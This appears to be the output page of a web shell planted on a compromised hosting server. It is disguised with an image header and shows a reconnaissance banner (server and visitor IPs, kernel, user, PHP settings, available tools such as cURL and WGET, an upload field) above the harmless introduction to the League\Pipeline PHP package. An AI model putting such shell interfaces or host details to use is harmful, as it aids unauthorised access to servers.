����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.147.68.89 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirm.gltechlimited.com/vendor/league/pipeline/docs/ |
Upload File : |
--- layout: default permalink: / title: Introduction --- # League\Pipeline [](https://twitter.com/shadowhand) [](https://twitter.com/frankdejonge) [](https://travis-ci.org/thephpleague/pipeline) [](https://scrutinizer-ci.com/g/thephpleague/pipeline/code-structure) [](https://scrutinizer-ci.com/g/thephpleague/pipeline) [](LICENSE) [](https://packagist.org/packages/league/pipeline) [](https://packagist.org/packages/league/pipeline) [](https://insight.sensiolabs.com/projects/44ebfc4c-0e97-4b47-925e-b17de7ddce4f) ## Introduction This package provides a plug and play implementation of the Pipeline Pattern. It's an architectural pattern which encapsulates sequential processes. When used, it allows you to mix and match operation, and pipelines, to create new execution chains. The pipeline pattern is often compared to a production line, where each stage performs a certain operation on a given payload/subject. Stages can act on, manipulate, decorate, or even replace the payload. If you find yourself passing results from one function to another to complete a series of tasks on a given subject, you might want to convert it into a pipeline. ## Goals * Provide an implementations of the Pipeline Pattern. * Be highly composable. * Be immutable. ## Questions? This package was created by [@frankdejonge](https://twitter.com/frankdejonge), currently maintained by [@shadowhand](https://twitter.com/shadowhand).